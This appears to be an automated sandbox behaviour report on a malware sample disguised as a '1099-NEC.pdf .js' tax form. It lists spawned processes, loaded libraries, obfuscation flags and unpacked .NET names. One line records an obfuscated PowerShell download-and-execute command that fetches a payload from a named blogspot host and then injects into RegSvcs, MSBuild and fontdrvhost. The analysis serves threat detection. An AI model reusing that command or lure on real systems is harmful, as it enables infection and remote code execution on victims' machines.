Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,6931622229401212323,17754570736813438004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2064 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\1099-NEC.pdf .js"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 936
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 920
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 764
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: drprov.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: ntlanman.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: davclnt.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: davhlpr.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Section loaded: mswsock.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2532186545.0000023AD044E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2532186545.0000023AD044E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: fontdrvhost.exe, 00000021.00000003.1787769228.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1788934182.0000000004E01000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: fontdrvhost.exe, 00000021.00000003.1790129763.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1794426935.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: fontdrvhost.exe, fontdrvhost.exe, 00000021.00000003.1779873993.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1776780757.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fontdrvhost.exe, 00000021.00000003.1784698431.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1782580310.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: fontdrvhost.exe, 00000021.00000003.1779873993.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1776780757.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fontdrvhost.exe, 00000021.00000003.1784698431.0000000004E70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1782580310.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: fontdrvhost.exe, 00000021.00000003.1787769228.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1788934182.0000000004E01000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: fontdrvhost.exe, 00000021.00000003.1790129763.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000021.00000003.1794426935.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp

Source: 1099-NEC.pdf

Initial sample: PDF keyword /JS count = 0

Source: 1099-NEC.pdf

Initial sample: PDF keyword /EmbeddedFile count = 0

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 17.2.powershell.exe.23ab7ef0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 17.2.powershell.exe.23ac8ff6158.2.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: 1099-NEC.pdf

Initial sample: PDF keyword /OpenAction

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05880376 push ebp; iretd	19_2_0588040C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B967A0 push esp; iretd	19_2_05B967A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B9A98F push esi; ret	19_2_05B9A9BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B9A11E push ebx; iretd	19_2_05B9A11F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B93A0A push edi; iretd	19_2_05B93A0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B92F7B push cs; iretd	19_2_05B92FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B94760 push edi; ret	19_2_05B94761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B9E55E push ds; ret	19_2_05B9E841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_05B9E540 push edx; iretd	19_2_05B9E55C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588C69C push ds; iretd	19_2_0588C6A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588C694 push eax; iretd	19_2_0588C695
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588C6A4 push cs; retf 0000h	19_2_0588C709
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588C728 pushfd ; retf 0000h	19_2_0588C72D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_0588C740 push edx; retf	19_2_0588C751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 19_2_06526951 push es; retf	19_2_06526957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_05525D5E push esi; ret	20_2_05525D69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_05521F6A push eax; ret	20_2_05521F75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_05524FD4 push ss; retf	20_2_05524FF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_055231DC push eax; ret	20_2_055231DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_05524F89 push edi; iretd	20_2_05524F96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_0552625D push es; ret	20_2_05526264
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_05523C39 push ecx; ret	20_2_05523C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_055220F9 push FFFFFF82h; iretd	20_2_055220FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_055254F9 push edx; retf	20_2_055254FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_055238EC push edi; ret	20_2_055238F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056EDF77 push edx; retf	20_2_056EDF7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056EC740 push edx; retf	20_2_056EC751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056EC551 push cs; retf 0000h	20_2_056EC709
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056EC728 pushfd ; retf 0000h	20_2_056EC72D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_056F7F04 push eax; iretd	20_2_056F7F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 20_2_05973120 push ebp; ret	20_2_05973248

Source: 17.2.powershell.exe.23ab7ef0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs	High entropy of concatenated method names: 'OHhxno9LMv59JwkpBPX', 'G66a6A9UBrBVeZ9yO97', 'Qn5CJCt4Zo', 'vh0ry9Sq2v', 'NAgCzWe3ZP', 'pY9pAMnRJn', 't34paM2Ne2', 'xvopCy1n4p', 'FjhRFseRF0', 'AWLahn4oRf'
Source: 17.2.powershell.exe.23ab7ef0000.0.raw.unpack, B.cs	High entropy of concatenated method names: 'Main', 'w0wVCfytf', 'KimKarden', 'eVExnSBWA', 'H7e8o26fl', 'HiPnANG73', 'agI9UShdl', 'lskkZTUSN', 'jtX7KDGmL', 'hCmRr5SQP'
Source: 17.2.powershell.exe.23ab7ef0000.0.raw.unpack, A9CvUGp4kU1V2hHRFHn.cs	High entropy of concatenated method names: 'OX7e2Hy5Pt', 'dWKevvZJWu', 'rs4eoMXh0k', 'C7heyHoNeq', 'VmMegQgJFI', 'sPJeTlCyGc', 'gveeEdLYki', 'TmWWCaItRt', 'JXxeXmkKa9', 'cJwe5uCKXW'
